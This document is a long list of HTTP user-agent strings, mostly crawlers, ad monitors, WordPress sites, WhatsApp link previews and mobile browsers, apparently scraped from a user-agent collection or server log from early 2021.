(compatible; Squidbot/1.0) +Mozilla/5.0 (iPhone; CPU iPhone OS 13_1_3 like Mac OS X) adbeat.com/policy AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Mobile/15E148 Safari/604.1 +Java/11.0.1 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-US) AppleWebKit/525.28.3 (KHTML, like Gecko) NetNewsWire/3.1.7 +Stewdio Windmaker 2.2 +PHP_itsnumberseven.com +WordPress/5.5.1; https://axaconsulting.ro +WordPress/5.6; https://baliventure.com +WordPress/5.6; https://bestpillowsleepers.com +WordPress/5.6; https://www.galletameadows.com +PHP (www.dingo.com.ua), hosted by www.ukraine.com.ua +WordPress/5.4.4; https://gcodes.de +securityJavaScript.com Bot +WordPress/5.5.3; https://gourmetbasket.com.au +WordPress/5.5.3; https://kodypromocyjne.info +WordPress/5.5.3; https://galaktyczny.pl +WordPress/5.6; https://northerncaliforniahikingtrails.com/blog +Amazon CloudFront X-Middleton/1 +WordPress/5.6; https://www.arcticspas.ca/en/ +WordPress/5.4.4; https://www.rerc.org.au +WordPress/5.6; https://www.softfully.com +WordPress/5.6; https://www.ontariolimoservices.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1610688391-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1610694130-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1610694132-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.6.8.732 (SpeedMode; Proxy; Android 7.0; K9_Kavach_4G ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1610707681-0 +WhatsApp/2.21.2.5 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1610736508-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1610736509-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1610736524-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1610736595-0 +WhatsApp/2.21.2.3 A +WordPress/5.6; https://websitesofficial.com +Tiny Tiny RSS/17.12 (0cd4a88) (http://tt-rss.org/) +WordPress/5.5.3; https://academy.aurachain.nbeta.ro +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.101 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1610816395-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1610816397-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1610816408-10 +PHP/5.3.75 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1610839133-10 +WordPress/5.6; https://es.moyens.net +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1610785504-0 +WordPress/5.6; https://pt.moyens.net +WhatsApp/2.2100.5 N +WordPress/5.6; https://it.moyens.net +WhatsApp/2 +WhatsApp/2.21.2.6 A +Java/15-ea +HotJava/1.1.2 FCS +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1610766588-0 +unirest-java/3.1.00 +AvsDeviceSdk/1.21.0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1610898545-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1610898546-10 +YOURLS v1.5 +http://yourls.org/ (running on http://divineurl.com) +Apache-HttpClient/4.5.2 (Java/1.8.0_265) +YOURLS v1.7.9 +http://yourls.org/ (running on https://xn--twtter-4va.de) +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36 PTST/210116.220127 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1610842603-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1610847407-10 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36 PTST/210117.150109 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1610904872-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1610910099-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1610910068-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1610910088-10 +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1610844167-0 +WordPress/5.6; https://www.tecupdate.com +WordPress/5.6; https://de.moyens.net +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1610885367-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1610927129-0 +yacybot (/global; amd64 Linux 5.4.0-59-generic; java 1.8.0_275; Etc/en) http://yacy.net/bot.html +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 Edg/86.0.622.63 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1610976846-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1610985949-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1610972390-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 PTST/210117.150109 +WordPress/5.6; https://skreened.club +Friendica 'Red Hot Poker' 2021.01-1384; https://venera.social +WordPress/5.6; http://stocks.ru.com +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.0.1041 (SpeedMode; Proxy; Android 8.1.0; SM-N900 ) U2/1.0.0 Mobile +WordPress/5.6; https://bramjbook.com +PHP/5.3.00 +PHP/5.2.91 +WordPress/5.6; https://fpmp39.ru EWWW/582.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611091585-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611100380-10 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1611017995-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1611023223-0 +GuzzleHttp/6.3.3 curl/7.52.1 PHP/7.2.10 +TelegramBot (like TwitterBot),gzip(gfe) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611083139-0 +WhatsApp/2.21.1.8 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611090510-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611083125-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611083102-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611083102-60 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.8.1006 (SpeedMode; Proxy; Android 6.0.1; SM-G600FY ) U2/1.0.0 Mobile +Faraday v0.11.0 +yacybot (/global; amd64 Windows 10 10.0; java 1.8.0_261; Asia/ru) http://yacy.net/bot.html +WordPress/5.6; https://precom-multimedia.com +WordPress/4.9.15; http://www.aztft.co +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611083126-10 +yacybot (/global; amd64 Windows 10 10.0; java 1.8.0_271; Asia/en) http://yacy.net/bot.html +DuckDuckBot/1.0; (+https://duckduckgo.com/duckduckbot.html) +Mozilla/5.0 (compatible; Mail.RU_Bot/2.0) +Mozilla/5.0 (Linux; Android 8.1.0; DRA-LX5 Build/HUAWEIDRA-LX5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.62 Mobile Safari/537.36 Mozilla/5.0 (Linux; Android 9; Redmi Note 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.90 Mobile Safari/537.36 Mozilla/5.0 (Linux; Android 4.2.2; GT-I9192) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Mobile Safari/537.36 Mozilla/5.0 (Linux; arm_64; Android 8.1.0; BKK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 YaBrowser/19.9.6.88.00 Mobile Safari/537.36 Mozilla/5.0 (Linux; Android 8.1.0; ASUS_X00DD) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.62 Mobile Safari/537.36 Mozilla/5.0 (Linux; Android 5.1.1; LG-D686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36 Mozilla/5.0 (Linux; Android 8.1.0; MI 8 Lite) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.90 Mobile Safari/537.36 Mozilla/5.0 (iPhone; CPU iPhone OS 13_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 YaBrowser/19.5.2.38.10 YaApp_iOS/17.10 YaApp_iOS_Browser/17.10 Safari/604.1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 UBrowser/6.2.4098.3 Safari/537.36 Mozilla/5.0 (Linux; Android 9; motorola one macro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.62 Mobile Safari/537.36 Mozilla/5.0 (Linux; Android 7.0; SM-A320F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.62 Mobile Safari/537.36 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3833.102 Safari/537.36 Mozilla/5.0 (Linux; arm_64; Android 5.1; HUAWEI TIT-AL00) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 YaBrowser/19.9.4.104.00 Mobile Safari/537.36 Mozilla/5.0 (Linux; arm_64; Android 7.1.2; Redmi Note 5A Prime) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 YaBrowser/19.9.6.88.00 Mobile Safari/537.36 Mozilla/5.0 (Linux; Android 9; SM-J730FM Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Mobile Safari/537.36 YaApp_Android/9.05 YaSearchBrowser/9.05 Mozilla/5.0 (Linux; arm_64; Android 8.0.0; ATU-L31) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 YaBrowser/19.9.6.88.00 Mobile Safari/537.36 Mozilla/5.0 (Linux; Android 9; JSN-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.90 Mobile Safari/537.36 Mozilla/5.0 (iPad; CPU OS 9_3_6 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/57.0.2987.137 Mobile/13G37 Safari/601.1.46 Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Waterfox/56.3 Mozilla/5.0 (Linux; Android 5.0; K016 Build/LRX21V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36 Mozilla/5.0 (Linux; Android 8.1.0; vivo 1816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.62 Mobile Safari/537.36 Mozilla/5.0 (Linux; Android 7.0; PRA-LA1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.62 Mobile Safari/537.36 Mozilla/5.0 (Linux; Android 7.1.1; SM-J250F Build/NMF26X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.62 Mobile Safari/537.36 YaApp_Android/9.40 YaSearchBrowser/9.40 Mozilla/5.0 (Linux; Android 6.0.1; SM-A500FU) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.90 Mobile Safari/537.36 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Iridium/2019.04 Safari/537.36 Chrome/73.0.0.0 Mozilla/5.0 (Linux; Android 8.1.0; YUHO_Vast2 Build/O21019) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36 Mozilla/5.0 (Linux; Android 5.1.1; SM-J200F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.62 Mobile Safari/537.36 Mozilla/5.0 (Linux; arm_64; Android 8.0.0; LLD-L31) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 YaBrowser/19.9.6.88.00 Mobile Safari/537.36 Mozilla/5.0 (Linux; Android 8.0.0; ASUS_X00RD) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.62 Mobile Safari/537.36 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2566. +yacybot (/global; amd64 Linux 4.19.0-13-amd64; java 1.8.0_242; Etc/en) http://yacy.net/bot.html +Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.2.962 (SpeedMode; Proxy; Android 5.0; SM-G900P ) U2/1.0.0 Mobile +WordPress/5.6; https://www.nachedeu.com +WordPress/5.6; https://www.nach-welt.com +WordPress/5.6; https://www.notiulti.com +PHP/5.3.65 +WhatsApp/2.21.2.9 A +WhatsApp/2.21.1.10 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1611103297-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611105939-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1611109168-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611114947-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.5.2.1188 (SpeedMode; Proxy; Android 5.0.1; ALCATEL_ONE_TOUCH_7025D ) U2/1.0.0 Mobile +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_16_0) AppleWebKit/537.36 (KHTML, like Gecko) anywhere.app/8.2.0 Chrome/80.0.3987.165 Electron/8.5.0 Safari/537.36 Tc-webkit AppEngine-Google; (+http://code.google.com/appengine; appid: s~live-fullspectrum) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611162527-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611166827-0 +WhatsApp/2.2100.7 N +WhatsApp/2.21.1.13 A +WordPress/5.6; https://zows.online +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 PTST/210119.200125 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1611186726-60 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4393.0 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:84.0) adbeat.com/policy Gecko/20100101 Firefox/84.0 +Screaming Frog SEO Spider/3.2 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.47 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.100 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611253366-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611253369-10 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.109 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611273155-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611224312-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1611191654-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1611199800-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611210782-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611224311-0 +WhatsApp/2.21.2.10 A +WordPress/5.6; https://iniciarbr.net +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611264893-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611264895-0 +Apache-HttpClient/4.5.9 (Java/1.8.0_282) +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 PTST/210120.190146 +https://user-agents.net/s/raOZGzAOGN/https://html.duckduckgo.com/html?q=troll%20poppy%20doll +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1611274752-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1611279938-0 +WordPress/5.6; https://bitlab.com.br/bitwiki +WordPress/5.5.3; https://test.academy.aurachain.ch +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.112 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1611275644-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1611281036-0 +WordPress/5.6; http://fastusaproxy.com +WordPress/5.6; https://techhana.com +WhatsApp/2.21.2.11 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611303522-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611303522-60 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611303521-0 +okhttp/okhttp-3.11.10.2 +WordPress/4.9.16; http://opal4.shinraebc.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611303523-10 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/W.X.Y.Z Safari/537.36 +WordPress/5.6; https://www.itprc.com +WordPress/5.5.3; https://compconfig.ru +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611422544-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611422541-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611431224-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1611364008-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1611373875-0 + + + +WordPress/4.9.16; http://opal.shinraebc.com +Mozilla/5.0 (iPhone; CPU iPhone OS 13_5_1 like Mac OS X) adbeat.com/policy AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Mobile/15E148 Safari/604.1 +Bot.Bul.Com.Tr/0.0.1 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611514495-0 +yacybot (/global; amd64 Linux 5.4.80-gentoo-r1; java 1.8.0_272; Europe/en) http://yacy.net/bot.html +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.5.2.1188 (SpeedMode; Proxy; Android 7.1.2; SM-C111 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots),gzip(gfe) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611462094-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611462096-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611462399-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.0.1016 (SpeedMode; Proxy; Android 4.4.4; SM-J727T1 ) U2/1.0.0 Mobile +Mozilla/5.0 (X11; Linux x86_64; rv:84.0) adbeat.com/policy Gecko/20100101 Firefox/84.0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.114 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WordPress/3.7.5; http://wayfudlingti.unblog.fr +WordPress/3.7.5; 